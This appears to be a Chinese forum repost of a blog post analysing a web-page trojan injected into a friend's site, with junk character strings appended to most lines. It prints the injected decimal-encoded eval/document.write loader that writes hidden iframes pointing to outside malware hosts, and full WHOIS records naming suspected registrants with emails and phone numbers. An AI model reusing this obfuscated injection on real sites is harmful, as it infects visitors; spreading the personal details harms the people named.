[原创]一篇刚写的分析木马手记

首发在我的博客里面， z$32rt8{`v  
`2s!%
/  
http://www.areway.cn/?p=175 +K57. n{  
WNjwv/  
kN1MPd4Yh  
周末上线鸭子就Q我说他的站给挂了马，当时没太注意就直接打开了连接，截下了网页源码： kSQ8kU_w+  
          '|C3t!H`  
<script>t=’60,105,102,114,97,109,101, ly[LF1t  
32,115,114,99,61,104,116,116,112,58,47,47, X%1TsCKMj  
102,114,101,101,46,117,45,117,117,117,46,99, )D)5 `n)  
110,47,101,114,114,111,114,46,104,116,109, /:&!o2&1H  
32,119,105,100,116,104,61,49,48,48,32,104,
l>?c AB[  
101,105,103,104,116,61,48,62,60,47,105,102, ^PksXfk  
114,97,109,101,62′; nV;'UpQw  
t=eval(’String.fromCharCode(’+t+’)');document.write(t);</script> C_.9qo]DT7  
                                                                                                  \oQ]=dDCd%  
<script>t=’60,105,102,114,97,109,101,32,115, )*,/L <  
114,99,61,104,116,116,112,58,47,47,102,114, @ D+ft
b/  
101,101,46,117,45,117,117,117,46,99,110,47, gV_/
t+jI  
101,114,114,111,114,46,104,116,109,32,119,
^u
/%z
L  
105,100,116,104,61,49,48,48,32,104,101,105, K"}fD;3  
103,104,116,61,48,62,60,47,105,102,114,97, t8Zo9q>  
109,101,62′;t=eval(’String.fromCharCode(’+t+’)'); qS!r<'F3dP  
document.write(t);</script> )?L=o0  
                                                                                                  `2~>$Tr  
<html xmlns=” .J"N}  
http://www.w3.org/1999/xhtml :$5A3i  
“> gg;r;3u  
<head> 5\-uo&#  
<!– Published By Newasp.cc 2007-12-7-18:03:23 –> \U~4b_a
N  
<meta http-equiv=”Content-Type” content=”text/html; charset=gb2312″ /> S:\i M:  
<title>首页 - 爱生活家庭网 c8qr-x1HG  
                                                                                                                                                    !liV Y]  
上面有一段 script的十进制加密字段，里面的大概内容是，把所有的字符放在函数t里面，最后用doucment.write(t)来把字符串写在网页里面。 $Gn.G_"v  
转换字符串后的大概内容是（谁点击后果自付）： n\#YGL<n  
<script>t=’<iframe src=http://free.u-uuu.cn/error.htm width=……… 29R-Up!SVN  
                                                                                                                                  WL$^B@gXQ  
查询玉米u-uuu.cn的详细信息： v\0G`&^1  
Domain Name: u-uuu.cn gt&|T j  
ROID: 20070901s10001s64972306-cn ~}/Dl#9R!  
Domain Status: ok l^B.
iB  
Registrant Organization: 王雷 I$Nh|eM  
Registrant Name: 王雷 ~xH&"1  
Administrative Email: czlovexs@126.com kmuksT\)a  
Sponsoring Registrar: 北京万网志成科技有限公司 B[vj X"yg  
Name Server:ns.yovole.com e_vsiT  
Name Server:ns1.yovole.com D7ex{SVA)  
Registration Date: 2007-09-01 17:54 # kI>  
Expiration Date: 2008-09-01 17:54 R#(0C(FI^  
最后PING了一下地址 都没有什么…. cw;wv+|k  
                                                                                                ZO}Og&%  
上虚拟机里面继续分析，IE里面打开上面的连接…查看源代码…..直接又有嵌套. #m+!<  
<iframe src=http://www.foafau.info/ms15.htm width=1 height=1></iframe> q>q:ZV  
<script language=”javascript” src=” 0bNvmZ$  
http://count43.51yes.com/click.aspx?id=4333375720&logo=6″></script D)_ C@*q  
> MfTLa)Rz  
这个玉米应该有可能是木马作者的： #c!:&9oU  
foafau.info的详细信息： \/-c)  
Access to INFO WHOIS information is provided to assist persons in |Td+,>,  
determining the contents of a domain name registration record in the 4DXbeQs:  
Afilias registry database. The data in this record is provided by CU$khz"  
Afilias Limited for informational purposes only, and Afilias does not aM^iDJ$>  
guarantee its accuracy.  This service is intended only for query-based k15vs  
access. You agree that you will use this data only for lawful purposes r@r%qkh(.@  
and that, under no circumstances will you use this data to: (a) allow, 0r]n 0?x  
enable, or otherwise support the transmission by e-mail, telephone, or GnV0~?  
facsimile of mass unsolicited, commercial advertising or solicitations Er~17$b  
to entities other than the data recipient’s own existing customers; or 8WP>u8&  
(b) enable high volume, automated, electronic processes that send $o6/dEKQ  
queries or data to the systems of Registry Operator, a Registrar, or &}ZmT>q`$  
Afilias except as reasonably necessary to register domain names or D{|qP nE4  
modify existing registrations. All rights reserved. Afilias reserves E3L?6Q
fx>  
the right to modify these terms at any time. By submitting this query, vNv?trw  
you agree to abide by this policy. fF:57*ys  
Domain ID:D22418703-LRMS fJ,N.O+9E  
Domain Name:FOAFAU.INFO 8$Q`wRt(%  
Created On:20-Nov-2007 16:05:42 UTC :-&|QVH  
Last Updated On:20-Nov-2007 16:05:44 UTC ?-??>& z  
Expiration Date:20-Nov-2008 16:05:42 UTC iP/v"g"g  
Sponsoring Registrar:GoDaddy.com Inc. (R171-LRMS) U%{GLO   
Status:CLIENT DELETE PROHIBITED G#iQX`  
Status:CLIENT RENEW PROHIBITED q:{#kv8  
Status:CLIENT TRANSFER PROHIBITED St=nf\P&F  
Status:CLIENT UPDATE PROHIBITED ;%|im?  
Status:TRANSFER PROHIBITED e r" w{  
Registrant ID:GODA-040110615 c=\tf~}^Ms  
Registrant Name:liu hong (5a73%>@  
Registrant Organization: P{L=u74b{x  
Registrant Street1:beijing }v(wjD  
Registrant Street2: 6*8Wtq  
Registrant Street3: V>$( N/1  
Registrant City:beijing owVvbC2<b(  
Registrant State/Province: 6|97;@94  
Registrant Postal Code:100000 PN}+LOD<t  
Registrant Country:CN #mH@ /6,#[  
Registrant Phone:+86.860108888777 6K2e]r  
Registrant Phone Ext.: U}v`~'K  
Registrant FAX: :I"CQ C[Z  
Registrant FAX Ext.: 2 a<\4w'  
Registrant Email:bbbshiji@163.com *[MWvs:,  
Admin ID:GODA-240110615 '1<Z"InU
 
Admin Name:liu hong nx9PNl@?V  
Admin Organization: zVhyAf  
Admin Street1:beijing _ %s#Cb  
Admin Street2: jiI=tg;  
Admin Street3: 3)OZf{D[  
Admin City:beijing #86N !&x  
Admin State/Province: uf(ayDE  
Admin Postal Code:100000 VA/2$5Wu  
Admin Country:CN ~G@NWF?7  
Admin Phone:+86.860108888777 [%IOB/{N  
Admin Phone Ext.: Ht`fC|E  
Admin FAX: /iW+<@Mas  
Admin FAX Ext.: $Dg-;I  
Admin Email:bbbshiji@163.com l![M
,8  
Billing ID:GODA-340110615 ~NGM6+9  
Billing Name:liu hong e8a^"Z`a  
Billing Organization: 6(|mdk`i  
Billing Street1:beijing p l)":}/)  
Billing Street2: 1-RY5R}VR  
Billing Street3: zal]t$z>  
Billing City:beijing IrwQ~z3I  
Billing State/Province: #-az]s|N  
Billing Postal Code:100000 ^[ae )}  
Billing Country:CN s"L&y <?)  
Billing Phone:+86.860108888777 .Xg.,kW  
Billing Phone Ext.: '.}}k!#  
Billing FAX: Q+CJd>B  
Billing FAX Ext.: ; :e7Z^\/k  
Billing Email:bbbshiji@163.com ! FcGa  
Tech ID:GODA-140110615 .=y=Fv6X  
Tech Name:liu hong 09Hrn  
Tech Organization: bC&A@.g{  
Tech Street1:beijing /"m s  
Tech Street2: ET*A0rt  
Tech Street3: .[={Yx0!I  
Tech City:beijing FT).$h~+4  
Tech State/Province: iIfiv<(ChM  
Tech Postal Code:100000 ?pL|eS7  
Tech Country:CN tX*@r  
Tech Phone:+86.860108888777 O7.V>7Y9H  
Tech Phone Ext.: UlXm4\@  
Tech FAX: 9~p;iiKGG  
Tech FAX Ext.: Zy0M\
-Mn  
Tech Email:bbbshiji@163.com VPN 9 Ql=  
Name Server:NS27.DOMAINCONTROL.COM 7o4E_ .*  
Name Server:NS28.DOMAINCONTROL.COM O{:{P5  
Name Server: BRFsw`c  
Name Server: I=`?4%  
Name Server: KdNo'*;U]_  
Name Server: (}#&HE
<  
Name Server: WC_.j^sW  
Name Server: G/x6zdk  
Name Server: Km2~nkQ  
Name Server: P0N/bp2Uy  
Name Server: /Qgb t  
Name Server: :kZ]Swi 5  
Name Server: *h^->+0n  
                                                                                                          lM-\:Q!
  
接着下载每个文件里面的代码： m:_#kfC&K"  
一步一步看..
v[CR$@Y  
G<Z}G8FW^  
\Z*:l(  
jAQ{
H  
z
K0M WyXO  
%PW-E($o<  
都是十进制的代码，也懒得再分析了，有这个爱好的大家可以继续试试

看过了就是没看懂。。。

要是有全部 就好了 传上来